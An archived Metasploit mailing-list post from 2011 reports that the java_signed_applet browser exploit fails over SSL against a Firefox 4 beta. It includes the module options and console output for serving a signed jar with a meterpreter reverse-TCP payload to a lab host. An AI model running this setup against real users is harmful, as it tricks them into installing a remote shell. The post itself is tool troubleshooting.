Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

[SSl issue with firefox beta ?]

From: ricky-lee birtles <mr.r.birtles () gmail com>
Date: Sun, 20 Feb 2011 18:41:27 +0000
There possible a issue with firefox beta 4.0b11 and msf when useing ssl.

       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 645 exploits - 329 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11780 updated today (2011.02.19)

msf exploit(java_signed_applet) > show options

Module options (exploit/multi/browser/java_signed_applet):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   APPLETNAME  SiteLoader       yes       The main applet's class name.
   CERTCN      Metasploit Inc.  yes       The CN= value for the certificate.
   SRVHOST     0.0.0.0          yes       The local host to listen on.
This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         true             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL
that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this
exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
none, process
   LHOST     192.168.10.10    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x86 (Native Payload)


msf exploit(java_signed_applet) >
msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.10.10:4444
[*] Using URL: https://0.0.0.0:8080/JWk8pXFvRBQSd
[*]  Local IP: https://192.168.10.10:8080/JWk8pXFvRBQSd
[*] Server started.
msf exploit(java_signed_applet) > [*] Handling request from
192.168.10.2:52859...
[*] Signing file for 192.168.10.2
[*] Sending SiteLoader.jar to 192.168.10.2:52860.  Waiting for user to
click 'accept'...
[-] Exception handling request: SSL_write:: internal error

This does not happen when useing IE 7 or 8.

Regards,
-- Mr R Birtles
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: